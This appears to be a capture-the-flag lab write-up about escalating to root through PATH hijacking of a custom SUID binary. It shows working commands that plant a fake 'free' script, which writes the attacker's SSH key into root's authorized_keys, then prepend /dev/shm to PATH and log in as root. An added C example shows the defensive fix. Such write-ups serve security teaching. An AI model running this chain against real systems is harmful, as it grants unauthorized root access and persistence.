SUID to Path Hijacking


When a user executes an SUID (Set User ID) binary, the resulting process inherits the environment variables of the user who ran it. That inheritance is convenient for carrying user-specific settings and configuration, but it is also a security concern: the binary runs with the privileges of its owner (often root) while its environment, including PATH, is chosen by the unprivileged caller. Whenever the binary's behaviour depends on that environment, an attacker can manipulate the variables to make privileged code do something it was never meant to do, which is a path to privilege escalation.

During the earlier assessment, a custom SUID binary (/bin/sysinfo) was identified that checks the system's status by invoking several other binaries. None of those invoked binaries is referenced by its absolute path, so each one is looked up through the caller's PATH. That oversight is exploitable: whoever runs the binary can place a directory they control at the front of PATH and have a malicious program of the same name executed in place of the real one, effectively "hijacking" the operation with the SUID binary's privileges. It is imperative to address this vulnerability promptly.

theseus@ubuntu:/dev/shm$ echo 'mkdir -p /root/.ssh ; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" > /root/.ssh/authorized_keys' > /dev/shm/free ; chmod 777 /dev/shm/free

The command above writes a "binary" named free to /dev/shm whose content is a short sequence of shell commands:

  • first create an SSH directory in the home directory of the root user
  • then write my own public SSH key to the authorized_keys file of the root user

theseus@ubuntu:/dev/shm$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
theseus@ubuntu:/dev/shm$ export PATH=/dev/shm:$PATH
theseus@ubuntu:/dev/shm$ echo $PATH
/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

I will then update the current user's environment variable so that it starts with the current directory (/dev/shm), where the malicious binary, free, resides.

theseus@ubuntu:/dev/shm$ /bin/sysinfo
 
[...REDACTED...]
 
====================MEM Usage=====================

Upon the execution of the SUID binary, I can no longer see the usual output of the free command. This indicates that the SUID binary has executed the malicious binary, /dev/shm/free, instead of the original one at /usr/bin/free.
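The hijack above works because sysinfo lets the caller's PATH decide which "free" runs. The following C program is an added example written for this write-up, not the box's sysinfo binary or any code recovered from it, showing how a privileged helper should behave instead: it audits a PATH string against an allowlist, refuses bare command names, and runs helpers by absolute path under a fixed environment. The names TRUSTED_PATH, path_is_trusted and run_fixed are chosen here, and TRUSTED_PATH assumes a conventional Ubuntu directory layout.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* The only search path a privileged helper should ever use. Assumption:
 * a conventional Ubuntu layout; /usr/games, /snap/bin and anything the
 * caller prepends (such as /dev/shm) are deliberately absent. */
#define TRUSTED_PATH "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

/* 1 if `dir` is exactly one of the directories listed in TRUSTED_PATH. */
static int dir_in_trusted(const char *dir)
{
    char needle[4100];
    if (snprintf(needle, sizeof needle, ":%s:", dir) >= (int)sizeof needle)
        return 0;
    return strstr(":" TRUSTED_PATH ":", needle) != NULL;
}

/* Audit a PATH string before trusting it: every entry must be absolute
 * and in the allowlist. An empty entry ("::", a leading or trailing ':')
 * and "." both mean "current directory" and are rejected, as is any
 * directory outside the allowlist, e.g. the /dev/shm prepended above. */
int path_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        char entry[4096];
        if (len == 0 || len >= sizeof entry)
            return 0;
        memcpy(entry, p, len);
        entry[len] = '\0';
        if (entry[0] != '/' || !dir_in_trusted(entry))
            return 0;
        if (end == NULL)
            return 1;
        p = end + 1;
    }
}

/* Run a helper by absolute path with a fixed, minimal environment, so the
 * caller's PATH (and LD_* variables) never influence what is executed.
 * Returns the child's exit status, 127 if exec failed, or -1 when the
 * request is refused or fork/wait fails. A bare name like "free" is refused. */
int run_fixed(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/' || argv == NULL)
        return -1;
    char *const envp[] = { "PATH=" TRUSTED_PATH, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, envp);
        _exit(127);               /* exec failed: mirror the shell's convention */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* The PATH exported in the write-up, with /dev/shm in front, fails the audit. */
    printf("hijacked PATH trusted? %d\n",
           path_is_trusted("/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"));
    printf("TRUSTED_PATH trusted?  %d\n", path_is_trusted(TRUSTED_PATH));

    /* What sysinfo effectively did (look "free" up through PATH) is refused ... */
    char *const bare[] = { "free", NULL };
    printf("run_fixed(\"free\") -> %d\n", run_fixed("free", bare));

    /* ... and the helper is run by its absolute path under the fixed environment. */
    char *const args[] = { "/usr/bin/free", "-m", NULL };
    printf("/usr/bin/free exited with %d\n", run_fixed("/usr/bin/free", args));
    return 0;
}
```

Compile with `cc -o safe_sysinfo safe_sysinfo.c`. The two functions are independent: a helper that only ever calls run_fixed with absolute paths does not need the caller's PATH at all, and path_is_trusted is there for wrappers that must fall back to a lookup and want to reject a caller-controlled PATH up front rather than after the wrong binary has already run.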

┌──(kali㉿kali)-[~/archive/htb/labs/magic]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519   
enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
 
 * Canonical Livepatch is available for installation.
   - reduce system reboots and improve kernel security. activate at:
     https://ubuntu.com/livepatch
 
407 packages can be updated.
305 updates are security updates.
 
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
Your Hardware Enablement Stack (HWE) is supported until April 2023.
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
root@ubuntu:~# whoami
root
root@ubuntu:~# hostname
ubuntu
root@ubuntu:~# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.185  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:77ae  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:77ae  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:77:ae  txqueuelen 1000  (Ethernet)
        RX packets 192201  bytes 24263685 (24.2 MB)
        RX errors 0  dropped 35  overruns 0  frame 0
        TX packets 184050  bytes 53813741 (53.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 16578  bytes 1296648 (1.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16578  bytes 1296648 (1.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise